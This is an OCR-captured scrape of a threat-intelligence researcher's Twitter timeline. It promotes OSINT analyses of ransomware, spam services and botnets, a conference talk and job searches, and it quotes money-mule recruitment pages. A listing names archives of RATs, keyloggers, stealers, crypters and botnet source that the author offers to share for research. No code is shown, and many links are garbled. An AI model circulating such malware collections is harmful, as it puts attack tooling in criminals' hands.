* SecureWorks (US) 
* Trend Micro (US) 
* United States Cyber Consequence Unit (US) 


I’m also dominating the "GoodFATR" - https://t.co/Ueu2UznFKp IoCs research project 
with research and analysis which is great news. Thanks a lot and I promise to keep 
the rhythm of production and dissemination of IoCs and cyber attack analysis going. 
https://t.co/KCgrqsvDSO 


22:34 


in the origins. Surprisingly, the top contributor is the personal blog 
from Dancho Danchev, followed by two Medium blogs that aggregate 
blockchain and cybersecurity news. The RSS top-10 is rounded 
by the research labs of three large companies (Cisco, F5, Malwarebytes), 
two other personal blogs (Bruce Schneier, contagiodump), 
and two magazines (Cointelegraph.com and BleepingComputer). 
Interestingly, two of the RSS top 10 origins focus on blockchain. We 


I’m also listed in @ThreatConnect’s - "CAL Automated Threat Library (ATL) Supported 
Blogs" - https://t.co/nTO4elINvkm. Here’s my RSS feed - https://t.co/X13e76nFj7 Stay 
tuned! https://t.co/keWh6x0YiY 
Dancho Danchev's Blog 


23 - Sunday 


03:00 


My RSS feed - https://t.co/X13e76nFj7 #security #cybercrime #malware 
https://t.co/LeOixgtol7 


in the origins. Surprisingly, the top contributor is the personal blog 
from Dancho Danchev, followed by two Medium blogs that aggregate 
blockchain and cybersecurity news. The RSS top-10 is rounded 
by the research labs of three large companies (Cisco, F5, Malwarebytes), 
two other personal blogs (Bruce Schneier, contagiodump), 
and two magazines (Cointelegraph.com and BleepingComputer). 
Interestingly, two of the RSS top 10 origins focus on blockchain. We 


22:55 


On November 8 I will be giving a presentation at Cyber Security Talks Bulgaria -
https://t.co/oQGWQzqDF) wish me luck! Regards. Dancho.
https://t.co/l6srhyegmb


20:25 - An Introduction to the World of Cybercrime OSINT and Threat Intelligence Gathering 



24 - Monday 


17:04 


Subscribe! - https://t.co/7GM1oNwjxi #security #cybercrime #malware #CyberAttack 
#CyberSecurity #CybersecurityAwarenessMonth #cybersecuritytips #cyberattacks 
#ThreatHunting #threatintelligence #threatintel https://t.co/QiyVUGLIkF 
Dancho Danchev's Newsletter


Cybercrime OSINT Security Blogging Threat
intelligence Cyber Warfare Information and
Asymmetric Warfare Exposed


Launched 7 months ago


25 - Tuesday 


00:11 


Exposing a Compilation of Known Locky Ransomware Themed BitCoin Addresses - An 
OSINT Analysis - Part Three on Dancho Danchev’s Newsletter 
https://t.co/tOZDZMO05vg 


00:11 


Exposing a Compilation of Known Locky Ransomware Themed BitCoin Addresses - An
OSINT Analysis - Part Two on Dancho Danchev’s Newsletter https://t.co/37U9MRJrjZ


00:11 


Exposing a Compilation of Known Locky Ransomware Themed BitCoin Addresses - An 
OSINT Analysis - Part Four on Dancho Danchev’s Newsletter https://t.co/SolubTOr)W 


00:12 


Exposing a Compilation of Known Locky Ransomware Themed BitCoin Addresses - An 
OSINT Analysis - Part Five on Dancho Danchev’s Newsletter https://t.co/n39Eg7keAf 


00:12 
Exposing a Compilation of Known Locky Ransomware Themed BitCoin Addresses - An 
OSINT Analysis - Part Six on Dancho Danchev’s Newsletter https://t.co/72VPFWBLXo


00:14 

A Compilation of 20,000 Known Ransomware BitCoin Transaction IDs and BitCoin 
Addresses - An OSINT Analysis on Dancho Danchev’s Newsletter https://t.co/JjGAFFs]3| 
00:14 


A Compilation of 20,000 Known Ransomware BitCoin Transaction IDs and BitCoin 
Addresses - An OSINT Analysis - Part Two on Dancho Danchev’s Newsletter 
https://t.co/vE4tLikmjS 
00:14 


A Compilation of 20,000 Known Ransomware BitCoin Transaction IDs and BitCoin 
Addresses - An OSINT Analysis - Part Three on Dancho Danchev’s Newsletter 
https://t.co/O8TWFWOZYn 
00:15 


A Compilation of 20,000 Known Ransomware BitCoin Transaction IDs and BitCoin 
Addresses - An OSINT Analysis - Part Four on Dancho Danchev’s Newsletter 
https://t.co/dsl1hQacNOi 
00:15 


A Compilation of 20,000 Known Ransomware BitCoin Transaction IDs and BitCoin 
Addresses - An OSINT Analysis - Part Five on Dancho Danchev’s Newsletter 
https://t.co/IQtfyuFH2a 
14:01 


Exposing a Compilation of 20,000 Ransomware Themed BitCoin Transaction IDs and 
BitCoin Addresses - An OSINT Analysis https://t.co/GqxVZKYJU3 


*1 

14:01 

Exposing a Compilation of 20,000 Ransomware Themed BitCoin Transaction IDs and 
BitCoin Addresses - An OSINT Analysis - Part Four https://t.co/G7gb3fkdnm 

*1 

14:01 


Exposing a Compilation of 20,000 Ransomware Themed BitCoin Transaction IDs and 
BitCoin Addresses - An OSINT Analysis - Part Three https://t.co/TbAIWi4eHI 


14:01 


Exposing a Compilation of 20,000 Ransomware Themed BitCoin Transaction IDs and 
BitCoin Addresses - An OSINT Analysis - Part Two https://t.co/JcpAlwWL9Aa 


14:01 


Exposing a Compilation of 20,000 Ransomware Themed BitCoin Transaction IDs and 
BitCoin Addresses - An OSINT Analysis - Part Five https://t.co/7WxwLO8fBH 
22:35
My New RSS Feed https://t.co/CIMgETHf7R 


22:35 


Dancho Danchev - The Re-Surrection - 2022 - Official Come Back Or a "Brief History 
Into the World of Hacking Security Blogging OSINT and Threat Intelligence Gathering" 
- A Guide To The Scene https://t.co/uysl6cVdUp 


22:35 


How to Build an Information Security Industry "At Home" - The Definite Manual - An 
Analysis https://t.co/wGY60lOGHH 


22:35 


Inside the KillNet Crowd-Sourced DDoS Attack Campaign Targeting International Web 
Sites - An OSINT Analysis https://t.co/vMVPpY8G83 


26 - Wednesday 


03:03 
Cyber Intelligence - Personal Memoir - Grab a Copy Today! https://t.co/Z7qgphYizr 
03:03 


People’s Information Warfare vs the U.S DoD Cyber Warfare Doctrine - An Analysis 
https://t.co/DwSpcLrRGG 


03:03 


Exposing a Compilation of Money Mule Recruitment Related Screenshots - An OSINT 
Analysis https://t.co/ZnP1qO0jGmL 


08:54 
The Most Wanted Cyber Jihadist - An Analysis https://t.co/cynQQDjSGM 
08:54 
Leadership Basics - An Analysis https://t.co/qCuHaHdkjo 
08:54 


A Pragmatic Cyberwarfare Doctrine - What Money Cannot Buy - An Analysis 
https://t.co/1fGoTyjYLI 


09:20 


Should a Country Physically Bomb the Source of the Cyber Attack? - An Analysis 
https://t.co/ZBmhtsLnQu 


09:20 
Ten Signs It’s a Slow News Week - An Analysis https://t.co/SixJcspIsL 
09:20
Bureaucratic Warfare Against Unrestricted Warfare - An Analysis 
https://t.co/G3ejxXco07 
09:20 
The U.S is Facing a Cyber Warfare Doctrine Crisis - An Analysis 
https://t.co/38rkqXAzHb 
09:20 
Spotting Moguls - An Analysis https://t.co/tTTok8PrFd 


27 - Thursday 


00:47 
My New RSS Feed - Part Two https://t.co/zlybHds5Si 


*2 
00:47 


Exposing "Emennet Pasargad/Eeleyanet Gostar/Net Peygard Samavat" Iran-Based 
Company on FBI’s Most Wanted Cybercriminals List - An OSINT Analysis 
https://t.co/Twa2RIPtly 


07:38 


Who DDoS-ed Georgia/Bobbear.co.uk and a Multitude of Russian Homosexual Sites in 
2009? - An OSINT Analysis https://t.co/cxc40EX3Sw 


10:05 

Exposing a Compilation of Botnets-in-the-Wild Screenshots - An Analysis 

https://t.co/Oucw5whT9D 
28 - Friday 
00:14 
CAPTCHA is Dead! - Here’s the Proof https://t.co/x4lq6E4B4U 

*1 
00:14 

Mobile Malware - Hype or Threat? - An Analysis https://t.co/4AlxiFaVO1 
03:46 


Exposing a Portfolio of YaBucks Pay Per Install Affiliate Network Scareware Serving 
Domains - An Analysis https://t.co/OYBzBT0oZt 
16:00


Exposing a Compilation of Stolen Credit Cards Selling Domains - An Analysis 
https://t.co/g16DqqDe9h 


*1 
18:20 


Exposing A E-Shop for Selling Access to Compromised PCs - An Analysis 
https://t.co/34faTrEG87 


29 - Saturday 


10:07 


From the LOL - "Laughing Out Loud" - Department! Cheers and happy weekend 
everyone! - https://t.co/JTcqOaYgET Full video here - https://t.co/Uf20e06cgi 
#Threatintel #threatintelligence https://t.co/neP8qdju78 


2 2 


EROWID 


Dancho Danchev's Vlog
Topic: "Psychedelic Reality"
Host: Dancho Danchev
Position: Independent Contractor
Web Site: https://ddanchev.blogspot.com
Email: dancho.danchev@hush.com


10:13 


Thank You For Following Me! https://t.co/jS5maElcUqG 


22:34 


Good Morning Europe. Today’s walk. Beginning to record these. Meanwhile grab the 
265GB torrent - https://t.co/8mZuSzwrsw Cheers! https://t.co/EDxgNOXji2 


*1 


30 - Sunday 


19:18 


Accepting Guest Bloggers on cybercrime security blogging OSINT and threat 
intelligence including anything information security related at https://t.co/JTcqOaYgET 
Send an email at dancho.danchev@hush.com to discuss! #ThreatIntelligence 
#ThreatHunting https://t.co/FsrLYZVTAT 


Summarizing A Portfolio Of Recently 
Released WhoisXML API Threat Research 
Reports Courtesy Of Me - An Analysis 


21:20 
Who wants to become Guest Blogger at https://t.co/JTcqOaYgET? 


21:29 


Dancho Danchev InFraud Organization - YouTube Maltego Demonstration - An 
Analysis https://t.co/6éhwr3LwmtM 


21:29 
Dancho Danchev’s Vlog - Psychedelic Reality Session - YouTube Video - An Analysis 
https://t.co/jLbaq20q3E 
21:29 


Dancho Danchev - Official Come Back - YouTube Video - An Analysis 
https://t.co/hO)XIwbHjs 


21:29 


Dancho Danchev SecondEye Solutions - YouTube Maltego Demonstration - An 
Analysis https://t.co/IBIBNInNUKL 


21:29 


Do You Want to Become Guest Blogger or Post a Guest Post Here? 
https://t.co/C68BNvOmFnq 


23:09 


I’m offering exclusive access to my Cybercrime Forum Data Set for 2021. Interested? 
Drop me a line at dancho.danchev@hush.com and I'll send you the direct download 
links. https://t.co/nO9x2xRvGj 
FORUM DATA SET 2021


OVER 111 FULL OFFLINE COPIES (19GB) OF PUBLICLY ACCESSIBLE CYBERCRIME
FORUM COMMUNITIES. FREE TO DOWNLOAD FOR PROCESSING AND ENRICHMENT.


APPROACH ME AT DANCHO.DANCHEV@HUSH IN ORDER TO OBTAIN A FREE COPY!


23:09 


I’m offering exclusive access to my Cybercrime Forum Data Set for 2021. Interested? 
Drop me a line at dancho.danchev@hush.com and I'll send you the direct download 
links. https://t.co/wPuttuW47n 


*4 
HacPack_01 - Compressed (zipped) Fol. - 730,598 KB
Archive_01 - PowerISO RAR File - 655,805 KB
Tools - PowerISO RAR File - 259,264 KB
HackPack - PowerISO RAR File - 175,814 KB
Malicious_Software_RATs_Cybercri.. - PowerISO RAR File - 166,073 KB
Tools_01 - PowerISO RAR File - 138,313 KB
Sources-delphi_crypters_packers_r... - PowerISO RAR File - 135,925 KB
Stealer Pack DarkCoderl4 - PowerISO RAR File - 108,583 KB
Bots-2 - PowerISO RAR File - 83,852 KB
spam_tools - PowerISO RAR File - 69,338 KB
spamming_tools - PowerISO RAR File - 69,338 KB
BotNet.Source.Codes - PowerISO RAR File - 68,373 KB
Malicious_Software_RATs_Keylogge... - PowerISO RAR File - 68,199 KB
Ashiyane_Security_Team_Group_H... - PowerISO RAR File - 59,751 KB
Malicious_Software_Keyloggers_Cr... - PowerISO RAR File - 56,337 KB
TDoS_Attack_Tools_Compilation - PowerISO RAR File - 23,822 KB
botnet-ddos - PowerISO RAR File - 12,227 KB
Malware_Crypters_Source_Code - PowerISO RAR File - 9,944 KB
Malware_Crypters_Source_Code_01 - PowerISO RAR File - 6,371 KB
Stealer - PowerISO RAR File - 4,657 KB
Mujahedeen_Secrets_Encryption_T... - PowerISO RAR File - 3,161 KB
RazStealer 2 Cracked - PowerISO RAR File - 28 KB


31 - Monday 


01:07


A Peek Inside a Russian Web-Based Managed Spam Service - An Analysis
https://t.co/5zYo99NVyP


01:07


Profiling a Russia-Based Bulletproof Hosting Provider - An Analysis
https://t.co/ISKCOEF3Pn


02:32 


A Peek Inside the Earnings4u Managed Malware Distribution Service - An Analysis 
https://t.co/cMBis6YUNs 


05:01 


Thanks to everyone on Twitter who requested access to my Cybercrime Forum Data
Set for 2021 which is 67GB. The offer is still valid. Drop me a line at
dancho.danchev@hush.com and I would be happy to offer access and direct
download links. Enjoy! #threatintel https://t.co/Vf6Xc8D0zi


1 


05:03 


I also have a second compilation which is 3GB of hacking tools coming straight from
the source - the bad guys which I would be willing to share for research purposes as
well. Drop me a line at dancho.danchev@hush.com in case you’re interested.
#threatintel https://t.co/YomFcuX320

November 

1 - Tuesday 

02:54 


Yanluowang’s Ransomware Group’s Internal Communications Leaked by Russian 
Threat Actors - An Analysis https://t.co/9yILxpHa4a 


18:40 


Exposing a Chinese Web Site Defacement Attack Campaign Against Iran-based Web 
Sites - An Analysis https://t.co/wEhF3hQ4Hc 


18:40 


Exposing a Publicly Accessible CAPTCHA-Solving Service - An Analysis 
https://t.co/sSkA9Zfikdv 




18:40 


Exposing Recently Leaked Cybercrime-Friendly Forum Community Screenshots - An 
Analysis https://t.co/dnwh6Zn703 


18:40 
Exposing BBC’s Chimera DDoS Botnet - An Analysis https://t.co/UxzxnsWUXI 


18:40 


Exposing a SQL Injection Capable IRC Malware Bot - An Analysis 
https://t.co/qkKSdxjlHbk 


19:03 


Exposing a Malware Serving Client-Side Exploits Serving Campaign at CNET’s 
https://t.co/owEkodRbpk Abusing Input Validation Flaws - An Analysis 
https://t.co/d20o0qlajuA 


19:35 


Exposing a Sample Russia-Based Managed Web-Based Spam Service - An Analysis 
https://t.co/zJCRXPhJus 


19:35 

Exposing Sample Screenshots Courtesy of the Yes Web Malware Exploitation Kit - An 
Analysis https://t.co/RhvntiB2J8 

*1 

20:13 


Do you want to become Guest Blogger at https://t.co/JTcqOaYgET #security 
#cybercrime #malware #Threatintelligence #ThreatHunting drop me a line at 
dancho.danchev@hush.com 


21 %1 


2 - Wednesday 


07:20 
Who wants to be a guest blogger on this blog? https://t.co/ca53FntpzT


07:20

Who wants to be a guest blog writer on this blog? https://t.co/V8CeVdheS}
07:20

Who wants to become a guest blogger on this blog? https://t.co/qMLI6ndgLV
07:20


Who wants to be a guest blogger on this blog? https://t.co/QkFuY2WgHQ
07:20
Who Wants to Become a Guest Blogger At This Blog? https://t.co/tVL5MaqMLi


08:26 


https://t.co/oQGWQzq5Qb - thanks to @PavelGeorgiev20 for the invitation. See you
on November 8! Regards. Dancho. https://t.co/vs8tj70t30


From the Bulgarian side, the participant will be Dancho Danchev - a leading world
expert in the field of fighting cybercrime, also known as "the Bulgarian Cyber-Holmes".


21:34 


The Deepest of Them All - A Profile of Yavor Kolev - a Bulgarian Law Enforcement 
Officer Kidnapper and a Bulgarian Dipshit - An Analysis https://t.co/kEelyC9v4L 


3 - Thursday 


01:13 


Joseph Mlodzianowski Joining Dancho Danchev’s Blog as Guest Blogger - Stay tuned! 
https://t.co/aEQ8AE9yLc 


01:31 
Today’s walk. https://t.co/3m6RSHOFrk 
01:40


Exposing a Sample Rock Phish Phishing Campaign’s Botnet Hosted Infrastructure - An 
Analysis https://t.co/VjPLerrFM6 


01:40 


Profiling a Sample Scareware Serving Keywords Analysis Twitter Campaign - An 
Analysis https://t.co/1OUjjrT6JE 


01:40 


Exposing a Rogue Google AdSense Campaign Using Typosquatted Malware Serving 
Software Releases - An Analysis https://t.co/YQBFYwkWX0 


09:40 


Profiling a Email Password Harvesting Enabled Malicious Software Release - An 
Analysis https://t.co/alDxV64YFI 


09:40 


Exposing a Russia-Based Stolen and Compromised Credit Cards Checking Web Site - 
An Analysis https://t.co/1tE9Aej0aH 


10:35 
Profiling the ZeusEsta Managed ZeuS Crimeware Hosting Service - An Analysis 
https://t.co/nFWtlyNSUM


11:53 
Profiling the Limbo Crimeware Malicious Software Release - An Analysis 
https://t.co/2MjzWWFvQ8 
4 - Friday 
14:44 


Who has a valid Maltego License and wants to work on a Collaborative Graph with
me? Post a comment or send me an email at dancho.danchev@hush.com can you
please RT? Thanks! #security #cybercrime #malware #ThreatHunting
#Threatintelligence #threatintel https://t.co/6Vk9siFGol


27 *5 
21:47 
@MarioRojasChin Hey Mario. Just replied. Regards. Dancho 
5 - Saturday 
08:50 


@ron_miller Doing well over here. My RSS feed - https://t.co/3YYEAaB6UX 
https://t.co/MTv5WmuaEl 
Dancho Danchev's Blog - Mind Streams of Information Security Knowledge


In the overwhelming sea of information, access to timely, insightful and
independent open-source intelligence (OSINT) analyses is crucial for maintaining
the necessary situational awareness to stay on the top of emerging security
threats. This blog covers trends and fads, tactics and strategies, intersecting
with third-party research, speculations and real-time CYBERINT assessments, all


19:03 


@cbotol Hello. Yes. I am. Several people already approached me. Are you interested
in joining the project? Can you send a short introduction to
dancho.danchev@hush.com and I'll send you the details? Regards. Dancho


7 - Monday 


00:05 


Tomorrow I'm here - https://t.co/oQGWQzqDFJ wish me luck! #security
#cybercrime #malware #ThreatHunting #Threatintelligence CC: @JonathanAzaria
@PavelGeorgiev20 https://t.co/vxdxSMee23
Johnathan Azaria Dancho Danchev


04:32 


https://t.co/oQGWQzqDFJ #security #cybercrime #malware #ThreatHunting
#Threatintelligence https://t.co/9c7JUjbJ4H
CYBER SECURITY TALKS BULGARIA


DDOS ATTACKS - BIGGER! STRONGER! AND MORE ELUSIVE!


DANCHO DANCHEV


EXPERT IN THE FIELD OF CYBERCRIME FIGHTING AND THREAT INTELLIGENCE


TUESDAY NOVEMBER 8 | 19:00 EEST


SHARE TO PROTECT


18:32 
#NewProfilePic https://t.co/6GFbIWAHYV
18:43


https://t.co/JTcqOaYOur https://t.co/teixjzlbe8


8 - Tuesday


04:21 


4 hours left - https://t.co/oQGWQzqDF] wish me luck! #security
#cybercrime #malware #ThreatHunting #threatintelligence
https://t.co/QPMMvrBWpz


9 - Wednesday 


04:00 


The event was great! Expect photos and video! - https://t.co/oQGWQzqDF)
https://t.co/ballHaol7h




10 - Thursday 


03:07 


Outstanding. https://t.co/pcrF9YOIxC 
11 - Friday


10:20
Happy Friday! Cheers! #ThreatHunting #ThreatIntelligence https://t.co/Pa6GnNDeNu
10:42


Happy Friday! Cheers! - Part Two. https://t.co/ecczNIMNOh


12 - Saturday


02:17
https://t.co/JTcqOaYOur #ThreatHunting #threatintelligence https://t.co/7j2NchkdeO
02:18
https://t.co/JTcqOaYOur #ThreatHunting #threatintelligence https://t.co/rfRXmAUkCa 


5.3 Understanding Intelligence Sources 

The availability of the longitudinal data (the IOCs collected over 
a span of 13 years) also enables us to investigate the qualities of 
the indicators produced by different sources and their timeliness 
against new threats, as reported below. 


Timeliness. Using the aforementioned attack clusters (see Table 7),
we analyzed the distribution of the articles first reporting the attacks
over different blogs, as shown in Figure 8b. We found that 10
blogs were responsible for the first report of 60% the clusters (each
cluster likely to be a campaign). For example, the blog Dancho
Danchev first report 12 clusters, each time involving 45 IOCs on
average, which later also showed up on other blogs.


10:11 
https://t.co/T7RBnhMFDb


13 - Sunday 


01:29 


Who wants to participate in a podcast recording with me or do you know someone 
who might be interested? Reply here or drop me a line at dancho.danchev@hush.com 
#security #cybercrime #malware #CybersecurityAwarenessMonth 
#cybersecuritytips #ThreatHunting https://t.co/TF5iDqyZ6c 
11:14


Who’s waiting for the Second Edition? https://t.co/qLxz4Gvp7X [PDF] #security
#cybercrime #malware #ThreatHunting #threatintelligence #threatintel
https://t.co/DFUYcY]qiT
11:22


Dancho Danchev - Cyber Intelligence - Second Edition - Personal Memoir - Audio
Book - https://t.co/kjE9QOvQGc [PDF] - https://t.co/P9FAOWVQgX [MP3] The original
in English here - https://t.co/qLxz4GuRip [PDF] Enjoy reading and listening!
Regards. Dancho. https://t.co/fK9OCeKeyV
SmokeLoader Themed Malware Serving Campaign Spotted in the Wild - An Analysis
https://t.co/5BzXoxx1pK
Massive Malware Serving Campaign Abuses Portmap A Web Based Port Forwarding
Solution - An Analysis https://t.co/iEAAPQCTbU


16 - Wednesday


00:57 
https://t.co/5LKjhayZKL 
*1 
08:40 
Data Mining and Visualizing My Old GMail Account - An Analysis 
https://t.co/KjobuG6mMKRA 
08:40 


Sample Photos from My Cyber Security Talks Bulgaria Presentation - An Analysis 
https://t.co/HSIFUggiAu 


19:13 
https://t.co/sElhv2blY1 [PDF] #ThreatHunting #Threatintel https://t.co/uYSbjvUemZ 
https://t.co/NzsTDI5upD #ThreatHunting #Threatintel https://t.co/cOBhMVoaEl
https://t.co/xRgsfmqLlhZ #ThreatHunting #Threatintel https://t.co/722cYqxbko
https://t.co/BOQKpDTE4K - 562 pages - [PDF] #Threatintelligence
https://t.co/QRIXdzOFnP #ThreatHunting #Threatintelligence #threatintel


20 - Sunday


https://t.co/dROF8vtIRZ #security #cybercrime #malware #CyberSec
#cybersecuritytips #Threatintel #threatintelligence https://t.co/McwXiTA2ps 


Disruptive 
Individuals 


I have a birthday tomorrow. Wish me luck. https://t.co/JTcqOaYgET Photo courtesy of
my during my student years. Stay tuned! https://t.co/s4Jd6mdr3t
Anyone hiring? #Threatintel #ThreatHunting #threatreport


21 %1
03:33
Threema anyone?


26 - Saturday


07:34 


Exposing the Conti Ransomware Gang - https://t.co/BOQKpDCB2K [PDF] - 562 Pages. 
Original post here - https://t.co/TYV2P3Hfugq Stay tuned! #security #cybercrime 
#malware #ThreatHunting #Threatintel https://t.co/wHOQSrAdbf 
Q: How did you get involved in #OSINT? A: By reading this - https://t.co/tyuzORNYpG
[PDF] Catch up! Catch up! Catch up! - https://t.co/JTcqObfRwr
My old Twitter account archive here - https://t.co/gNBVQr8HkH - Psst - "Lovely Horse"
participant - https://t.co/Lxt3ZCnn04 #MyTwitterAnniversary https://t.co/YE4495s54a
02:34


"Exposing the Conti Ransomware Gang - An OSINT Analysis" - 
https://t.co/BOQKpDCB2K [PDF] - 562 pages. Original post here - 
https://t.co/TYV2P3Hfuq Stay tuned! https://t.co/kBezWUBMsB 
02:34


"Exposing the Conti Ransomware Gang - An OSINT Analysis" - 
https://t.co/BOQKpDTE4K [PDF] - 562 pages. Original post here - 
https://t.co/TYV2P3p6gi Stay tuned! https://t.co/LONgjbx5sf 
"Exposing the Conti Ransomware Gang - An OSINT Analysis" -
https://t.co/BOQKpDTE4K [PDF] - 562 pages. Original post here - 
https://t.co/TYV2P3p6gi Stay tuned! https://t.co/330UkOXipB 
05:19


Iran hackers study - Part 01 - https://t.co/zg7gV6K5Q1 [RAR] - Iran hackers study -
Part 02 - https://t.co/6OaWfY46G] [RAR] Enjoy! #ThreatIntelligence #threatintel
This article aims to examine the problem
Iran hackers study - Part 01 - https://t.co/zg7gV6K5Q1 [RAR] - Iran hackers study -
Part 02 - https://t.co/6OaWfY46G} [RAR] Enjoy! #Threatintelligence #threatintel
https://t.co/RETqxFogkz
05:35


Exposing Bulgaria - Who Stole the PC and Build a Fake Pro-Western Empire? - Part 01 - 
https://t.co/YEOWIAtXjT - Part 02 - https://t.co/c9XGjM3iaO Enjoy! 
https://t.co/p7j9bQF8f 
05:54


Second Edition of my "Cyber Intelligence" Memoir - https://t.co/qLxz4GuRip [PDF] in 
Bulgarian - https://t.co/kjE9QOvQGc [PDF] scheduled for digital release in January, 
2023. Stay tuned and Happy Holidays! #Threatintelligence #threatintel 
https://t.co/TywVfQyH9z 
22:41


Interested in helping me fund my research in a lifetime fashion where I can
guarantee all the high-quality research and analysis on a daily basis? Check out my
special Christmas Discount on Substack - https://t.co/r)JDQejLm5a enjoy!
#ThreatHunting #threatintel https://t.co/lOaLPmZEuF


2 - Friday


09:51 


Folks. Who wants to help me fund my research and let me dazzle you with the quality 
sophistication and relevance of my analysis? Just kidding here. Christmas Discount 
here - https://t.co/r/JDQejLm5a enjoy and stay tuned! #Threatintelligence 
#ThreatHunting https://t.co/XRq7TyLYcH 
https://t.co/tQ6Dn1R2kU #security #cybercrime #malware #ThreatHunting
#threatintelligence #threatreport #threatintel https://t.co/UddUMzcB1U
https://t.co/oQGWQzqDF] #security #cybercrime #malware #ThreatHunting
#Threatintelligence #threatintel https://t.co/FWIHPJ1p31
https://t.co/YPwSbChWJ2 #security #cybercrime #malware #ThreatHunting
https://t.co/YPwSbCOTH2 #security #cybercrime #malware #ThreatHunting
#threatintel https://t.co/wGt1QvzlZc
https://t.co/YPwSbChWJ2 #security #cybercrime #malware #ThreatHunting
#threatintel https://t.co/VO0agk3)]Wq
17:51


https://t.co/YPwSbCOTH2 #security #cybercrime #malware #ThreatHunting 
#threatintel https://t.co/mN3031PeiL 
19:20


Finally! I’ve managed to find the actual screenshot and I’ve decided to share it. Long
story short this is what used to be state of the art botnet for launching spam
campaigns circa 2008 and I’ve actually managed to find a screenshot demonstrating
it. Enjoy! https://t.co/mPtbc5FHva
19:24
And this is how we went online once upon a time. https://t.co/wEkeuyays6
4 - Sunday


05:20


Hello. Is anyone hiring in the field of cyber security, cybercrime analysis and
threat intelligence, including malicious code analysis, Dark Web monitoring, and
analysis of cyber security, cyber attacks and threats using public sources of
information? https://t.co/ICFNF25sSu
05:22


Including tracking cyber attacks and reaching their sources, as well as
recommendations for the response to such attacks? No recruiters, direct hiring
for the position. I'm interested in such positions in Sofia and I can start
immediately. https://t.co/LITkw2Zb5t
Here - https://t.co/O4zpbxks]] you can see a copy of my CV, and I prefer that you
contact me on LinkedIn or by email at dancho.danchev@hush.com and I will reply
right away so that we can agree on the next steps. Thank you. Regards.
Dancho https://t.co/dCnJhn3rYb


06:24 
Merry Christmas, everyone! Link: https://t.co/SJPh77aY3t Email:
dancho.danchev@hush.com for the password! Happy hunting! Regards. Dancho
#security #cybercrime #malware https://t.co/3LmMPwjLtRU
06:38


Here’s the actual link - https://t.co/WcTneCjTqt #security #cybercrime #malware 
Happy holidays! Regards. Dancho https://t.co/R5ui9vNmFh 
https://t.co/YPwSbChWJ2 https://t.co/GGeDbYHC28
https://t.co/YPwSbCOTHZ2 https://t.co/gO9iCasxcn
https://t.co/YPwSbChwWJ2 https://t.co/IsygzCQa27
11:34
https://t.co/4aRqt9hn0E #ThreatHunting #threatintel 


11:36 
https://t.co/AmbQPOtAI3 #ThreatHunting #threatintel 


13:36 


Some high-res photos of my Keynote at CyberCamp 2016 on the topic of the 
Koobface Botnet - https://t.co/q5iTxLeLlir https://t.co/6IMjy2XDzU 
Some high-res photos of my Keynote at CyberCamp 2016 on the topic of the
Koobface Botnet - https://t.co/q5iTxLeLlr https://t.co/kOY6w9xjbG
13:43
Money mule recruiters at their best - https://t.co/JTcqObfRwr https://t.co/IQ8UEZEif1
ABOUT US SERVICES CAREERS PARTNERS PRIVACY CONTACTS


WE ARE RECRUITING


PERFECT JOB FOR YOU


NEWS
Money mule recruiters at their best - https://t.co/JTcqObfRwr https://t.co/gHRIPrgUuXxc
Why is Panama so attractive Our Services Careers
Money mule recruiters at their best - https://t.co/JTcqOaYOur https://t.co/xnsALX30vB
Western Union orders details >


Employee details » 


Transfer type: Western Union 
First Name: 


Last Name: 


City: 

Country: 

Reference Number (MTCN)*: 908 .547 . 5754 ?) 
Western Union fee (USD)*: 600] 


First Name*: John 

Last Name*: Blackmore 
City*: New York 
Country*: United States 
Comments: 


Money mule recruiters at their best - https://t.co/JTcqObfRwr https://t.co/CCazgapVfE 
13:44
Money mule recruiters at their best - https://t.co/JTcqObfRwr https://t.co/VjcBpPVZey
Money mule recruiters at their best - https://t.co/JTcqObfRwr https://t.co/70LhrZMXC4
Name


Blanks, forms, tables
Application form (ENG)
Application form electron. (ENG)
Application form short (ENG)
Cover form for sending MG (ENG) (ONE)
Cover form for sending MG (ENG) (SPLIT)
Cover form for sending WU (ENG) (ONE)
Cover form for sending WU (ENG) (SPLIT)
Spanish
Registration form (ESP) (.DOC)
Cover form for sending WU (ESP) (SPLIT)
Form for bank details (ESP) (EEUU)
Form for a sent WU transfer (ESP)
Italian
Application form (ITAL)
Cover form for sending WU (ITAL)
Form for bank details (ITAL) (EU)
Form for a sent WU transfer (ITAL)
Forms for bank details
Bank Details Form /IBAN/ (ENG)
Bank Details Form /AU/ (ENG)
Bank Details Form /CA/ (ENG)
Bank Details Form /UK/ (ENG)
Bank Details Form /US/ (ENG)


https://t.co/JTcqObfRwr https://t.co/NIA2wgb9SE 
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13:51 
BakaSoftware - Exposed - https://t.co/nZcqdVfbzA https://t.co/n40SmNCkaS 
13:51
BakaSoftware - Exposed - https://t.co/nZcqdUX2Is https://t.co/kn63DLZ0Qs 


13:57 
Missing London? Stay tuned. https://t.co/OplQwftuZn 
[Image text:]
LONDON’S 24-26 EARLS COURT
WEBROOT STAND #G90
Get an inside look at the latest cybercrime trends from one of
today's most recognized threat intelligence experts.
DANCHO DANCHEV
Current & Emerging Trends Within the Cybercrime Ecosystem
Follow @Webroot on Twitter for showtimes and details


14:11 
Busted. https://t.co/JTIcqObfRwr https://t.co/wwWuutw1MG 
Busted. https://t.co/JTcqOaYOur https://t.co/7ZelUZLP73
11:03:42) - Topic removed by xd!


14:12 
Busted. https://t.co/JTcqObfRwr https://t.co/ndS70WwfZ6 
Busted. https://t.co/JTcqObfRwr https://t.co/pfCVcig98B
State of the art. BGP over VPN - https://t.co/bYBreqejx! https://t.co/4NPkIBT7RI
State of the art. BGP over VPN - https://t.co/bYBreqejxl https://t.co/Qx2J8ai3g9
State of the art. BGP over VPN - https://t.co/bYBreqwsLt https://t.co/QsB2rvxv9]
The site is closed for redesign


For support and connection, please call: (095)2734191, e-mail:support@ctlan.net. 


14:17 
DIY mobile malware on demand - https://t.co/JTcqObfRwr https://t.co/WMAWYtCrAl 
DIY mobile malware on demand - https://t.co/JTcqOaYOur https://t.co/sOZrYijN3H
DIY mobile malware on demand - https://t.co/JTcqObfRwr https://t.co/qRLgq2gxzV
DIY mobile malware on demand - https://t.co/JTcqObfRwr https://t.co/Zmfbs4zFZu
https://t.co/YPwSbCOTH2 #security #cybercrime #malware #ThreatHunting
#threatintel https://t.co/S2paxr5Tm7
04:11
Any EU-based security conferences or events? 


04:15 
Grab the torrent! https://t.co/WcTneCJTqt https://t.co/20a7VTVMkR 
09:30
https://t.co/oM7m70KAc9 https://t.co/rQpCWc5X4D 


herdProtect 


12:58 


Who's into investing in VR? How about VR for hackers and security experts? Drop me 
a line at dancho.danchev@hush.com and I'll present the project. Meanwhile - here’s 
